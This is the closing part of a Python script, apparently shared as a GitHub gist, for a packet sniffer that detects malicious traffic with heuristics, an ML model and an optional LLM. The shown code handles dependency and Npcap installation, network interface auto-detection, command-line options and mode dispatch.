        ens = [1 if (a or b) else 0 for a, b in zip(p_heur, p_llm)]
        row("Heur OR LLM", _metrics(y, ens), 0.0)
        ens_all = [1 if (a or b or c) else 0 for a, b, c in zip(p_heur, p_ml, p_llm)]
        row("Heur+ML+LLM", _metrics(y, ens_all), 0.0)
    print()
def train_model_main(dataset_path: str, model_output_path: str, logger: Optional[logging.Logger] = None) -> None:
    """CLI entry for ``--train``: delegate to MLClassifier.train_model with a resolved logger."""
    effective_logger = logger if logger else logging.getLogger(__name__)
    MLClassifier.train_model(dataset_path, model_output_path, logger=effective_logger)
def get_missing_runtime_dependencies() -> List[str]:
    """Return pip names of core packages whose module reference is None.

    The module-level references checked here are presumably set to None when
    the optional import fails -- confirm against the import block.
    """
    required = (
        ("aiohttp", aiohttp),
        ("PyYAML", yaml),
        ("cachetools", TTLCache),
        ("numpy", np),
        ("scapy", scapy),
    )
    return [pip_name for pip_name, module in required if module is None]
def detect_operating_system() -> str:
    """Map ``platform.system()`` to "windows", "linux", "macos" or "other"."""
    system_id = platform.system().lower()
    for prefix, label in (("win", "windows"), ("linux", "linux"), ("darwin", "macos")):
        if system_id.startswith(prefix):
            return label
    return "other"
def get_required_pip_packages(os_name: str) -> List[str]:
    """Return a fresh list of pip requirement names for *os_name*.

    *os_name* is a value from detect_operating_system(); "linux" additionally
    gets "bcc". llama-cpp-python is not in this list (install_dependencies
    installs it in a separate step).
    """
    packages = [
        "aiohttp", "PyYAML", "cachetools", "numpy", "scapy", "yara-python",
        "openai", "psutil", "pandas", "scikit-learn", "joblib", "huggingface_hub",
    ]
    if os_name == "linux":
        packages.append("bcc")
    return packages
def install_npcap_windows(logger: Optional[logging.Logger] = None) -> bool:
    """Ensure the Npcap capture driver is available on Windows.

    This is a no-op when check_packet_capture_backend() already succeeds.
    Otherwise it downloads the pinned official installer to the temp
    directory, runs it interactively (it may prompt for UAC), and re-checks.

    Returns:
        True if the capture backend is available afterwards, else False.
    """
    import shutil
    import tempfile
    from urllib.request import urlopen

    logger = logger or logging.getLogger(__name__)
    backend_ok, _ = check_packet_capture_backend(logger=logger)
    if backend_ok:
        logger.info("Npcap already available on this Windows machine.")
        return True
    # One place for the pinned release; URL and file name derive from it.
    installer_name = "npcap-1.87.exe"
    npcap_url = f"https://npcap.com/dist/{installer_name}"
    # gettempdir() honours TMPDIR/TEMP/TMP and falls back to a real temp
    # directory, instead of the current working directory.
    installer_path = os.path.join(tempfile.gettempdir(), installer_name)
    logger.info("Npcap not detected. Downloading official installer from %s", npcap_url)
    try:
        # urlretrieve() has no timeout and can block forever on a stalled
        # connection; urlopen's timeout bounds each connect/read operation.
        # NOTE(security): the executable is run without checksum or signature
        # verification -- integrity relies solely on HTTPS to npcap.com.
        with urlopen(npcap_url, timeout=120) as response, open(installer_path, "wb") as out_file:
            shutil.copyfileobj(response, out_file)
    except Exception as exc:
        logger.error("Failed to download Npcap installer: %s", exc)
        # Never leave a truncated .exe behind.
        try:
            os.remove(installer_path)
        except OSError:
            pass
        return False
    logger.info("Launching Npcap installer (may prompt for UAC/admin approval)...")
    try:
        subprocess.run([installer_path], check=True)
    except subprocess.CalledProcessError as exc:
        logger.error("Npcap installer exited with code %s", exc.returncode)
        return False
    except Exception as exc:
        logger.error("Failed to launch Npcap installer: %s", exc)
        return False
    backend_ok, backend_msg = check_packet_capture_backend(logger=logger)
    if not backend_ok:
        logger.error("Npcap still not available after installer run: %s", backend_msg)
        return False
    logger.info("Npcap installation verified successfully.")
    return True
def install_dependencies(logger: Optional[logging.Logger] = None) -> bool:
    """Install this tool's Python dependencies (and Npcap on Windows).

    Steps:
      1. pip-install the OS-specific list from get_required_pip_packages();
         this step is required.
      2. Best-effort install of llama-cpp-python from the prebuilt CPU wheel
         index; a failure only disables the local LLM backend.
      3. On Windows, ensure Npcap is installed (required).

    Returns:
        True if every required step succeeded, else False.
    """
    logger = logger or logging.getLogger(__name__)
    os_name = detect_operating_system()
    packages = get_required_pip_packages(os_name)
    logger.info("Detected operating system: %s", os_name)
    logger.info("Installing OS-specific Python dependencies...")
    # Use the pip bound to *this* interpreter first. A bare ``pip3`` on PATH can
    # belong to a different Python (system vs. virtualenv, or root's under
    # sudo); installing there "succeeds" but this script still cannot import
    # the packages. pip3 is kept only as a last-resort fallback.
    installers = (
        ("python -m pip", [sys.executable, "-m", "pip"]),
        ("pip3", ["pip3"]),
    )
    for label, command in installers:
        logger.info("Installing dependencies with %s...", label)
        try:
            subprocess.run([*command, "install", *packages], check=True)
        except subprocess.CalledProcessError as exc:
            logger.warning("%s install returned an error (exit code %s).", label, exc.returncode)
        except OSError as exc:
            # FileNotFoundError (installer not on PATH), PermissionError, ...
            logger.warning("Could not launch %s: %s", label, exc)
        else:
            if label == "pip3":
                logger.warning("Installed via pip3, which may target a different Python "
                               "interpreter than %s.", sys.executable)
            logger.info("Dependencies installed successfully via %s.", label)
            break
    else:
        logger.error("Dependency installation failed: no installer completed successfully.")
        return False
    # llama-cpp-python: prefer the prebuilt CPU wheel index (avoids a slow/fragile
    # source build, and the Windows long-path extraction failure).
    logger.info("Installing llama-cpp-python (prebuilt CPU wheel)...")
    try:
        subprocess.run(
            [sys.executable, "-m", "pip", "install", "llama-cpp-python",
             "--extra-index-url", "https://abetlen.github.io/llama-cpp-python/whl/cpu"],
            check=True,
        )
        logger.info("llama-cpp-python installed.")
    except Exception as exc:
        logger.warning("llama-cpp-python install failed (%s). Local LLM mode will be "
                       "unavailable; --llm-backend openai still works.", exc)
    if os_name == "windows":
        if not install_npcap_windows(logger=logger):
            logger.error("Windows install phase incomplete: Npcap setup failed.")
            return False
    return True
def is_likely_loopback(interface_name: str) -> bool:
    """Heuristically decide whether *interface_name* names a loopback interface.

    Matches, case-insensitively:
      * any name containing "loopback", e.g. "Npcap Loopback Adapter",
        "Software Loopback Interface 1", "NPF_Loopback";
      * Unix-style names "lo", "lo0", "lo1", ..., optionally with an alias
        suffix such as "lo:1".

    A plain substring test for "lo" is deliberately avoided: it matched real
    NICs such as "wlo1" (systemd Wi-Fi naming) and "Local Area Connection"
    (Windows), which made interface auto-detection skip them.
    """
    lowered = interface_name.strip().lower()
    if "loopback" in lowered:
        return True
    return re.fullmatch(r"lo\d*(?::\S*)?", lowered) is not None
def auto_detect_interface(logger: Optional[logging.Logger] = None) -> str:
    """Pick a capture interface, preferring non-loopback ones.

    Candidates are tried in order:
      1. scapy's default interface;
      2. the interface routing to 8.8.8.8;
      3. the first non-loopback entry of scapy's interface list.

    If all of these fail, the first listed interface is used even if it is
    loopback. Failures of individual probes are logged at debug level.

    Raises:
        RuntimeError: if no interface can be determined at all.
    """
    logger = logger or logging.getLogger(__name__)
    probes = (
        (lambda: str(scapy.conf.iface),
         "Auto-detected interface from Scapy default: %s",
         "Unable to use Scapy default interface for auto-detection."),
        (lambda: scapy.conf.route.route("8.8.8.8")[0],
         "Auto-detected interface from routing table: %s",
         "Unable to use routing table for interface auto-detection."),
    )
    for probe, found_msg, failed_msg in probes:
        try:
            candidate = probe()
            if candidate and not is_likely_loopback(candidate):
                logger.info(found_msg, candidate)
                return candidate
        except Exception:
            logger.debug(failed_msg)
    try:
        available = scapy.get_if_list()
        preferred = next((name for name in available if name and not is_likely_loopback(name)), None)
        if preferred is not None:
            logger.info("Auto-detected interface from interface list: %s", preferred)
            return preferred
        if available:
            logger.info("Falling back to first available interface: %s", available[0])
            return available[0]
    except Exception as exc:
        logger.debug("Failed to list interfaces during auto-detection: %s", exc)
    raise RuntimeError("Could not auto-detect a usable network interface.")
def _positive_int(value: str) -> int:
    """argparse ``type=`` converter accepting only integers >= 1."""
    try:
        number = int(value)
    except ValueError:
        raise argparse.ArgumentTypeError(f"invalid int value: {value!r}") from None
    if number < 1:
        raise argparse.ArgumentTypeError(f"must be a positive integer, got {number}")
    return number


def parse_arguments(argv: Optional[list] = None) -> argparse.Namespace:
    """Build the command-line parser and parse the arguments.

    Args:
        argv: Argument strings to parse, excluding the program name. When
            ``None`` (the default), ``sys.argv[1:]`` is used, which matches
            the original behaviour.

    Returns:
        The parsed ``argparse.Namespace``. ``whitelist`` is still the raw
        comma-separated string at this point; the caller post-processes it.

    Raises:
        SystemExit: Raised by argparse on invalid arguments or ``--help``.
    """
    parser = argparse.ArgumentParser(
        description="Enhanced Packet Sniffer with Red Alert, Whitelist, Sentry Mode, Dataset Building, Training, and LLM-assisted Labeling"
    )
    parser.add_argument("-i", "--interface", type=str, default="",
                        help="Network interface to sniff on")
    parser.add_argument("--install", action="store_true",
                        help="Install required dependencies (pip packages via the current "
                             "interpreter's pip; Npcap on Windows) and exit")
    parser.add_argument("--start", action="store_true",
                        help="Start sniffing with automatic interface detection when --interface is not provided")
    parser.add_argument("-l", "--logfile", type=str, default="sniffer.log",
                        help="Path to the main log file")
    parser.add_argument("--no-bgcheck", action="store_true",
                        help="Disable IP background lookup")
    parser.add_argument("--local-only", action="store_true",
                        help="Capture only local (private) traffic")
    parser.add_argument("--red-alert", action="store_true",
                        help="Enable red alert mode: only log packets from non-allied countries")
    parser.add_argument("--whitelist", type=str, default="US",
                        help="Comma-separated list of allied (whitelisted) country codes (default: US)")
    parser.add_argument("--sentry", action="store_true",
                        help="Enable sentry mode (ML-based detection of malicious packets; "
                             "blocking requires --enforce)")
    parser.add_argument("--model-path", type=str, default="model.pkl",
                        help="Path to the ML model file (used in sentry mode)")
    parser.add_argument("--train", action="store_true",
                        help="Run training mode to build a new ML model from a dataset")
    parser.add_argument("--dataset", type=str, default="",
                        help="Path to the CSV dataset for training "
                             "(omit to train a demo model on the built-in corpus)")
    parser.add_argument("--build-dataset", action="store_true",
                        help="Capture and build a labeled dataset interactively")
    # A zero or negative sample count makes no sense; reject it at parse time.
    parser.add_argument("--num-samples", type=_positive_int, default=10,
                        help="Number of samples to capture when building the dataset (must be >= 1)")
    parser.add_argument("--dataset-out", type=str, default="training_data.csv",
                        help="Path to save the built dataset CSV file")
    parser.add_argument("--llm-label", action="store_true",
                        help="Automatically label packets with the LLM in dataset building mode")
    parser.add_argument("--llm-backend", type=str, default="local", choices=["local", "openai"],
                        help="LLM backend: 'local' (GGUF via llama.cpp, default, free) or 'openai'")
    parser.add_argument("--llm-model", type=str, default="qwen2.5-3b",
                        help="Local model key: qwen2.5-3b (default), qwen2.5-1.5b, qwen2.5-0.5b")
    parser.add_argument("--llm-model-path", type=str, default="",
                        help="Explicit path to a local .gguf file (overrides --llm-model auto-download)")
    parser.add_argument("--enforce", action="store_true",
                        help="Actually apply firewall block rules (default: dry-run, log only)")
    parser.add_argument("--eval", action="store_true",
                        help="Run the AI evaluation harness (precision/recall on the labeled corpus) and exit")
    parser.add_argument("--no-llm", action="store_true",
                        help="In --eval, skip the (slow) local-LLM rows")
    parser.add_argument("--show-errors", action="store_true",
                        help="In --eval, print LLM misclassifications")
    parser.add_argument("--xdp", action="store_true",
                        help="Enable XDP (Express Data Path) to gather additional packet metadata")
    parser.add_argument("--expensive", action="store_true",
                        help="Use LLM to analyze all packets in realtime (expensive mode)")
    parser.add_argument("--yara-rules", type=str, default="",
                        help="Path to YARA rules file for signature scanning")
    parser.add_argument("--carve-dir", type=str, default="carved_objects",
                        help="Directory where carved files/objects are written")
    parser.add_argument("-v", "--verbosity", type=str, default="INFO",
                        help="Logging level (DEBUG, INFO, WARNING, ERROR)")
    return parser.parse_args(argv)
if __name__ == "__main__":

    def _resolve_interface(cli_args: argparse.Namespace, log: logging.Logger,
                           mode_name: str) -> None:
        """Ensure ``cli_args.interface`` is set, auto-detecting it under --start.

        Exits with status 1 if auto-detection raises, or if no interface was
        given and --start was not requested. *mode_name* ("Dataset" or
        "Sniffer") is used only in the error message.
        """
        if not cli_args.interface and cli_args.start:
            try:
                cli_args.interface = auto_detect_interface(logger=log)
            except Exception as exc:
                log.error("--start failed to auto-detect an interface: %s", exc)
                raise SystemExit(1)
        if not cli_args.interface:
            log.error("%s mode requires --interface or --start for auto-detection", mode_name)
            raise SystemExit(1)

    args = parse_arguments()
    # Normalise allied country codes; skip empty entries left by stray commas
    # (e.g. "US," or "US,,CA").
    args.whitelist = {code.strip().upper() for code in args.whitelist.split(",") if code.strip()}

    logging_level = getattr(logging, args.verbosity.upper(), None)
    if not isinstance(logging_level, int):
        # Unknown names, or logging-module attributes that are not levels
        # (e.g. BASIC_FORMAT), fall back to INFO instead of crashing setLevel().
        logging_level = logging.INFO
    setup_logging("logging.yaml")
    logging.getLogger().setLevel(logging_level)
    logger = logging.getLogger(__name__)

    if args.install:
        ok = install_dependencies(logger=logger)
        raise SystemExit(0 if ok else 1)

    if args.eval:
        if np is None:
            logger.error("--eval requires numpy and scikit-learn. Run with --install first.")
            raise SystemExit(1)
        run_eval(args, logger=logger)
        raise SystemExit(0)

    missing_runtime_deps = get_missing_runtime_dependencies()
    if missing_runtime_deps:
        logger.error(
            "Missing required dependencies: %s. Run with --install first.",
            ", ".join(missing_runtime_deps)
        )
        raise SystemExit(1)

    if args.build_dataset:
        _resolve_interface(args, logger, "Dataset")
        build_dataset_main(args.interface, args.num_samples, args.dataset_out, args.llm_label,
                           logger=logger, args=args)
    elif args.train:
        if not args.dataset:
            logger.warning("No --dataset given; training a demo model on the built-in corpus. "
                           "For production, capture+label real traffic with "
                           "--build-dataset --llm-label, then --train --dataset <csv>.")
        train_ml_model(model_output_path=args.model_path, csv_path=args.dataset, logger=logger)
    else:
        _resolve_interface(args, logger, "Sniffer")
        sniffer = PacketSniffer(args)
        sniffer.run()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment